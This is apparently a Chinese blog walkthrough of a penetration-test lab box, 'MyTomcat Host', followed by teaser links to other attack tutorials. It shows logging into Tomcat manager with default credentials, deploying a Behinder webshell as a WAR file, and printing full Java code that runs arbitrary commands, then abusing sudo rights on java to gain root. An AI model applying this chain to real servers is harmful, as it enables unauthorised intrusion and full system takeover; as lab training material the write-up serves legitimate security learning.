滲透測試之MyTomcat Host

原創 csdnPM250 2020-05-18 20:34

Nmap 進行端口掃描:存在22和8080端口

 

訪問8080端口,Tomcat管理界面,嘗試弱口令以及幽靈貓ajp漏洞。

(幽靈貓不再版本範圍之內)

tomcat:tomcat弱口令:

 

生成冰蠍的war包:jar cvf shell.war .\shell.jsp

直接訪問報錯500,通過冰蠍成功訪問:

啓用虛擬命令行,發現java具有sudo權限:(手殘把sudoers文件權限改了,再也並不能執行sudo命令了)

之後上傳java代碼,執行系統命令:

import java.io.BufferedReader;
import java.io.Closeable;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.*;
import java.util.StringTokenizer;

public class ProcessUtils {
	private final static String DEFAULT_CHARSET_NAME = "UTF-8";

	public static Result run(String commend) {

		return run(commend, DEFAULT_CHARSET_NAME);
	}


	public static Result run(String commend, String charsetName) {
		StringTokenizer st = new StringTokenizer(commend);
		String[] commendArray = new String[st.countTokens()];
		for (int i = 0; st.hasMoreTokens(); i++) {
			commendArray[i] = st.nextToken();
		}

		return run(Arrays.asList(commendArray), charsetName);
	}


	public static Result run(List<String> commend) {
		return run(commend, DEFAULT_CHARSET_NAME);
	}


	public static Result run(List<String> commend, String charsetName) {
		Result result = new Result();
		InputStream is = null;
		try {
			Process process = new ProcessBuilder(commend).redirectErrorStream(true).start();
			is = process.getInputStream();
			BufferedReader reader = new BufferedReader(new InputStreamReader(is, charsetName));
			StringBuilder data = new StringBuilder();
			String line;
			while ((line = reader.readLine()) != null) {
				data.append(line).append(System.lineSeparator());
				System.out.println("\033[0;35m" + line + "\033[0m");
			}
			result.code = process.waitFor();
			result.data = data.toString().trim();
		} catch (Exception e) {
			throw new RuntimeException(e);
		} finally {
			closeStreamQuietly(is);
		}

		return result;
	}

	private static void closeStreamQuietly(Closeable stream) {
		try {
			if (stream != null) {
				stream.close();
			}
		} catch (IOException e) {
			// ignore
		}
	}

	public static class Result {
	
		public int code;
		
		public String data;
	}


	public static void main(String[] args) {

		Result r = ProcessUtils.run(Arrays.asList(args));
		System.out.println("code:" + r.code + "\ndata:" + r.data);
	}
}

 

在windows編譯後上傳到服務器:

之後通過sudo運行java執行代碼,便可以獲得root權限:

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

短信驗證碼字典腳本

f = open('/Users/superzedlv/Desktop/yanzhengma.txt','w') start = 0000 end = 10000 print len(str(end)) b = '' #line

SuperZedLv 2020-07-08 05:30:22

滲透入門知識-CSRF漏洞原理到實戰

什麼是CSRF漏洞? 跨站請求僞造,就是黑客以被攻擊者的名義發送請求,完全合規合法。 CSRF原理 A站點存在CSRF漏洞、B站點爲黑客僞造包含A站點正常請求鏈接的站點。 1)當被攻擊者打開A站點,進行身份驗證,登陸成功。A站點服

SuperZedLv 2020-07-08 05:30:22

滲透測試入門知識-文件上傳漏洞原理到實戰

文件包含漏洞原理 程序開發人員一般會把重複使用的函數寫到單個文件中,需要使用某個函數時直接調用此文件,而無需再次編寫,這種文件調用的過程一般被稱爲文件包含。通過函數包含文件時,由於沒有對包含的文件名進行有效的過濾處理,被攻擊者利用

SuperZedLv 2020-07-08 05:30:22

安全漏洞從原理到實戰--命令執行漏洞

01 命令執行漏洞 即黑客可以通過控制參數執行系統命令,形成原因是開發人員對用戶輸入參數安全檢查不足從而導致的惡意命令執行。 02 常見的系統命令執行函數 Php命令執行函數eval()函數、assert()、preg_repla

SuperZedLv 2020-07-08 05:30:21

越權漏洞修復參考

0x00 背景   https://www.xx.com/service/order.do?orderid=2280582085200280582 上圖,選擇orderid作爲參數, 越權遍歷爬取其他人的信息,類似選擇某個參數或者某個接口

煜铭2011 2020-07-08 02:03:38

短信轟炸漏洞修復

0x00 漏洞背景 短信轟炸攻擊時常見的一種攻擊,攻擊者通過網站頁面中所提供的發送短信驗證碼的功能處,通過對其發送數據包的獲取後,進行重放,如果服務器短信平臺未做校驗的情況時,系統會一直去發送短信,這樣就造成了短信轟炸的漏洞。 攻擊者通過

煜铭2011 2020-07-08 02:03:38

內網滲透(上)

每日一句: 做安全,有一定實力的話。找工作,待遇不好就不要去,不要委屈求全。 世界上好地方那麼多,不出去看看的話,你就以爲這就是世界 另外,二進制其實也不是多值錢的玩意,沒必要覺得多深奧 聲明: 內網滲透

划水的小白白 2020-07-08 00:37:05

XCTF的easytornado題目

py是個好工具,要多加以利用 ![在這裏插入圖片描述](https://img-blog.csdnimg.cn/20200707170254527.png?x-oss-process=image/watermark,type_Z

001000001000 2020-07-08 00:12:42

Netcat安裝使用詳解

Netcat 從網絡的一段讀取數據,輸出到網絡的另一端(可以使用於TCP和UDP協議)   安裝 Windows可自行在github上下載netcat kali linux上 方法一: sudo yum install n

想冲大厂的癞蛤蟆 2020-07-07 11:59:33

phpmyadmin後臺getshell方法學習總結

0x00 前言 最近看的一篇文章中提到過phpmyadmin一些後臺getshell方式,就想着寫篇博客學習總結一下~~ 0x01 getshell方法 一、select into outfile直接寫入 1.利用條件 對web

0nc3 2020-07-07 09:51:37

Day8——提權學習之第三方軟件G6-FTP提權

0x00 G6-FTP簡介 G6 FTP Server 新一代的 FTP 服務器端軟件,支持 RFC-959 標準並增強其中的某些功能,上傳和下載都可以續傳,實時查看運行狀態,佔用帶寬,還有很多功能。 G6-FTP的默認端

0nc3 2020-07-07 09:51:37

Day9——提權學習之第三方軟件FileZilla提權

0x00 FileZilla簡介 FileZilla是一個免費開源的FTP軟件,分爲客戶端版本和服務器版本,具備所有的FTP軟件功能。 FileZilla的默認端口爲14147,只偵聽在127.0.0.1的14147端口

0nc3 2020-07-07 09:51:27

Day5——提權學習之MSSQL數據庫提權學習總結

0x00 SQLServer提權基礎 1、SQLServer權限 列出sql server 角色用戶的權限 按照從最低級別角色(bulkadmin)到最高級別角色(sysadmin)的順序進行描述: 1.bulkadmin:這個

0nc3 2020-07-07 09:51:27

sql注入技巧

堆疊注入 改變大小寫 寬字節 雙寫注入 截斷注入 se%lect 繞過安全狗 se/**/lect繞過 `param`繞過 rename和alter改變表的數據結構 預編譯{ Set @sql = CONCAT(‘se’,‘lec

001000001000 2020-07-07 07:50:31

XCTF題目 supersqli 的做題思路

在輸入框提交後瀏覽器自動進行URL編碼。若在hackbar中,則需要手動進行URL編碼。 嘗試: 1’ – 顯示結果 於是修改爲 1’# 顯示: 正常情況下輸入 一: 1 二: 1' and 1=1

001000001000 2020-07-07 07:50:31